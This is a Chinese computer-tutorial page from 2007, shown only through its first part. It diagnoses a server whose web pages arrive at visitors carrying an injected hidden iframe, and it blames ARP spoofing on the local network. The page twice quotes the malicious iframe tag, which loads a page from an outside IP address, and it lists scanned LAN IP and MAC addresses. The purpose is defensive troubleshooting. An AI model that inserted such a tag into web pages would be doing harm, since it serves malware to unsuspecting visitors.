电脑教程网  
| 电脑入门教程 | 操作系统教程 | 电脑优化教程 | 电脑知识技术 | 多媒体教程 | 网站制作教程 | 数据库教程 | 办公软件教程 | 电脑硬件教程 | 电脑作图教程 | 软件开发教程 | 组网技术教程 | 网络安全教程 | 网络编程教程 | 网络运营教程 | 应用软件下载 |
  当前位置:主页>病毒防治教程>文章内容
服务器arp病毒的发现和处理
来源:abcd论坛 作者:雨枫 发布时间:2007-11-21  
中毒者问题如下:

服务器IIS中了病毒,所有网站里都有了iframe木马
悬赏分:100 - 离问题结束还有 14 天 20 小时
我的服务器里所有网站,只要一访问我的站就有病毒,每个业面的源文件代码第一行全部多了一带代码
<iframe src=http://219.129.239.191/downs.htm width=100 height=0></iframe>
我检查过网站业面代码,都是正常的,代码里也没的这一短,所以我怀疑是服务器IIS的病毒,

求助:这个病毒怎么解决呢?

知道的人写详细一点,如果解决了追加分
引用地址:http://zhidao.baidu.com/question/37272610.html

第一感觉就是服务器被arp攻击影响了,

原因一.“我的服务器里所有网站,只要一访问我的站就有病毒,每个业面的源文件代码第一行全部多了一带代码
<iframe src=http://219.129.239.191/downs.htm width=100 height=0></iframe>
”按照这个说法,可以断定他的http数据流被截获并被编辑过,而且这样的截获一般都是把病毒调用代码发在第一行上,我遇到过很多网页挂马的案例,所有的挂马一般都是在页面代码底部,少数数据库挂马是在页面中实现的。
原因二。“我检查过网站业面代码,都是正常的,代码里也没的这一短”
通过这个更可以肯定是arp病毒了,因为服务器中页面文件肯定没毒,只是传动到访问者浏览器的途中多了那段病毒代码。所以可以肯定的讲中途数据流被编辑过了。这样的情况也有可能是访问者的网络中有arp病毒,因为arp病毒只能影响局域网。


手动检查:
用ip和mac地址扫描工具少了一下服务器所在局域网的ip段,得到了ip和mac地址列表如下:


     125.91.13.1   00:0F:FE:0D:D4:85
     125.91.13.2   00:13:8F:99:8A:8A
     125.91.13.3   00:19:21:98:69:4E
     125.91.13.5   00:0F:EA:3F:39:8B
     125.91.13.6   00:1A:4D:29:DB:7C
     125.91.13.4   00:08:75:03:24:C5
     125.91.13.7   00:0F:FE:2D:BE:9E
     125.91.13.8   00:15:58:CF:5E:09
     125.91.13.9   00:1A:4D:29:DB:56
    125.91.13.10   00:1A:4D:32:48:AF
    125.91.13.11   00:50:8D:74:27:76
    125.91.13.12   00:15:58:07:77:04
    125.91.13.13   00:1A:4D:29:E8:4E
    125.91.13.14   00:0E:7F:F8:34:F5
    125.91.13.15   00:1A:4D:34:6B:CC
    125.91.13.16   00:1A:4D:3A:7C:D6
    125.91.13.17   00:15:58:0E:DF:F5
    125.91.13.18   00:0F:FE:0E:21:38
    125.91.13.19   00:1C:25:08:FB:23
    125.91.13.20   00:13:8F:2A:49:B7
    125.91.13.21   00:15:58:07:79:A6
    125.91.13.24   00:1A:4D:32:92:45
    125.91.13.25   00:14:85:E3:0B:17
    125.91.13.22   00:14:85:E3:01:EA
    125.91.13.26   00:0F:EA:3F:38:AF
    125.91.13.27   00:1A:4D:29:E5:5A
    125.91.13.23   00:08:75:03:24:BF
    125.91.13.28   00:14:85:80:98:22
    125.91.13.29   00:13:8F:20:10:4F
    125.91.13.30   00:14:85:E8:FE:19
    125.91.13.32   00:13:20:C4:7D:A9
    125.91.13.33   00:02:E3:55:DD:D7
    125.91.13.34   00:0F:FE:2D:BE:81
    125.91.13.35   00:16:76:2C:9F:F3
    125.91.13.36   00:16:76:2C:9E:87
    125.91.13.39   00:13:D4:1A:51:24
    125.91.13.38   00:13:20:C4:69:DB
    125.91.13.42   00:13:20:C4:7E:8D
    125.91.13.44   00:14:85:EE:94:79
    125.91.13.46   00:13:20:C4:78:52
    125.91.13.47   00:13:20:C4:79:A6
    125.91.13.50   00:13:20:C4:79:1D
    125.91.13.51   00:11:2F:4D:99:0A
    125.91.13.52   00:0F:FE:2A:1F:10
    125.91.13.49   00:E0:A0:1D:BB:A8
    125.91.13.54   00:15:58:CF:64:B3
    125.91.13.55   00:1A:4D:32:92:54
    125.91.13.56   00:0F:FE:0B:DD:59
    125.91.13.57   00:14:85:E1:4D:15
    125.91.13.58   00:0F:FE:0F:50:C9
    125.91.13.59   00:0F:FE:2A:1F:9F
    125.91.13.60   00:13:D4:1A:67:86
    125.91.13.62   00:0F:FE:2A:1E:D4
    125.91.13.63   00:14:85:E1:4D:1B
    125.91.13.64   00:0F:20:38:98:4A
    125.91.13.65   00:0F:FE:2D:BE:A0
    125.91.13.66   00:19:66:23:7C:3C

(阅读次数:
共2页: 上一页 1 [2] 下一页
上一篇:什么是arp?--网络协议arp   下一篇:手动删除yok工具条
[收藏] [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论
  热点文章
·arp病毒的攻击原理和发现技巧
·手动删除yok工具条
·arp病毒原理
·什么是arp?--网络协议arp
·如何手动发现ARP病毒?
  相关文章
·手动删除yok工具条
·什么是arp?--网络协议arp
·arp病毒原理
·如何手动发现ARP病毒?
·arp病毒的攻击原理和发现技巧
123   最新推荐
计算机教程网